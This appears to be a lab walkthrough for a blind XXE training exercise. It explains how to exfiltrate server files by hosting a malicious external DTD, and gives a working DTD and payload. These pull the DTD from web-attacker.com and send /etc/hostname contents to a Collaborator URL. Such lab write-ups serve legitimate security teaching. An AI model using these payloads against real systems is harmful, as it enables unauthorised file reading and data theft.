Exploiting blind XXE to exfiltrate data using a malicious external DTD
The lab has a "Check stock" feature that submits XML to the server, where it is parsed. Intercept that request in Burp and send it to Repeater.
Detecting a blind XXE vulnerability via out-of-band techniques is all very well, but it doesn't actually demonstrate how the vulnerability could be exploited. What an attacker really wants to achieve is to exfiltrate sensitive data. This can be achieved via a blind XXE vulnerability, but it involves the attacker hosting a malicious DTD on a system that they control, and then invoking the external DTD from within the in-band XXE payload.
This makes the application's XML parser send the contents of a file to the attacker inside the query string of an HTTP request. Because newlines and other characters that are illegal in a URL make that request fail, this works for single-line files such as /etc/hostname; for multi-line files such as /etc/passwd you can try exfiltrating over ftp:// instead, pointing at a listener of your own that logs the raw FTP commands.
Example of a malicious DTD to exfiltrate the contents of the /etc/hostname file (the lab's target; the Academy explanation below uses /etc/passwd, but the DTD is identical apart from the file path):
This DTD carries out the following steps:
1. Defines an XML parameter entity called file, containing the contents of the /etc/passwd file.
2. Defines an XML parameter entity called eval, containing a dynamic declaration of another XML parameter entity called exfiltrate. The exfiltrate entity will be evaluated by making an HTTP request to the attacker's web server containing the value of the file entity within the URL query string.
3. Uses the eval entity, which causes the dynamic declaration of the exfiltrate entity to be performed.
4. Uses the exfiltrate entity, so that its value is evaluated by requesting the specified URL.
The attacker must then host the malicious DTD on a system that they control, normally by loading it onto their own webserver. For example, the attacker might serve the malicious DTD at the following URL:
http://web-attacker.com/malicious.dtd
Finally, the attacker must submit the following XXE payload to the vulnerable application:
This XXE payload declares an XML parameter entity called xxe and then uses the entity within the DTD. This will cause the XML parser to fetch the external DTD from the attacker's server and interpret it inline. The steps defined within the malicious DTD are then executed, and the /etc/passwd file is transmitted to the attacker's server.
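The two pieces described above (the hosted DTD and the payload that pulls it in), written out as an added example rather than the lab's own files. The URL http://web-attacker.com/malicious.dtd is the one the text uses; BURP-COLLABORATOR-SUBDOMAIN is a placeholder for your Collaborator payload, and the stockCheck body is an assumed stand-in for whatever request body the Repeater tab already holds.

```xml
<!-- ===== file 1: malicious.dtd, hosted on the attacker's server at
     http://web-attacker.com/malicious.dtd ===== -->

<!-- step 1: read the target file into a parameter entity -->
<!ENTITY % file SYSTEM "file:///etc/hostname">

<!-- step 2: build, at parse time, a second declaration whose SYSTEM URL
     embeds the file contents. Parameter entity references are expanded
     inside an entity value but not inside a SYSTEM literal, so the
     declaration of exfiltrate has to be assembled here. The '%' of that
     nested declaration is written as &#x25; so it is not treated as a
     reference while eval itself is being declared. -->
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://BURP-COLLABORATOR-SUBDOMAIN/?x=%file;'>">

<!-- step 3: expand eval, which performs the declaration of exfiltrate -->
%eval;

<!-- step 4: reference exfiltrate; the parser fetches the URL, and the
     query string now carries the file contents -->
%exfiltrate;


<!-- ===== file 2: the XXE payload sent to the "Check stock" endpoint ===== -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!-- declare a parameter entity pointing at the hosted DTD, then use it:
       the parser fetches malicious.dtd and interprets it inline -->
  <!ENTITY % xxe SYSTEM "http://web-attacker.com/malicious.dtd">
  %xxe;
]>
<stockCheck>          <!-- assumed original request body -->
  <productId>1</productId>
  <storeId>1</storeId>
</stockCheck>
```

The DTD has to be hosted externally rather than written into the DOCTYPE: parameter entity references inside markup declarations (the `%file;` in the eval value, and the `%eval;`/`%exfiltrate;` uses) are only permitted in the external subset, not in the internal subset of the document. The same two lines can be aimed at /etc/passwd by changing the file path, but that file is multi-line and the resulting URL is invalid, which is why the lab uses /etc/hostname and why the ftp:// variant exists for larger files.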
First, open Burp Collaborator and copy the Collaborator payload URL; this is where the exfiltrated data will arrive.
Next, go to the exploit server, paste the malicious DTD into the body (with the Collaborator URL in the exfiltrate entity's SYSTEM URL) and store it.
Click "View exploit" to confirm the DTD is being served and to note its URL.
Now go back to the "Check stock" request that was sent to Repeater.
Add a DOCTYPE to the XML body that declares a parameter entity pointing at the exploit server's DTD and references it, then send the request.
Finally, poll Collaborator: the recorded HTTP interaction has the contents of /etc/hostname in its query string, which confirms the data was exfiltrated.
I hope you found this walkthrough easy to understand and follow.
Greeting From Sayonara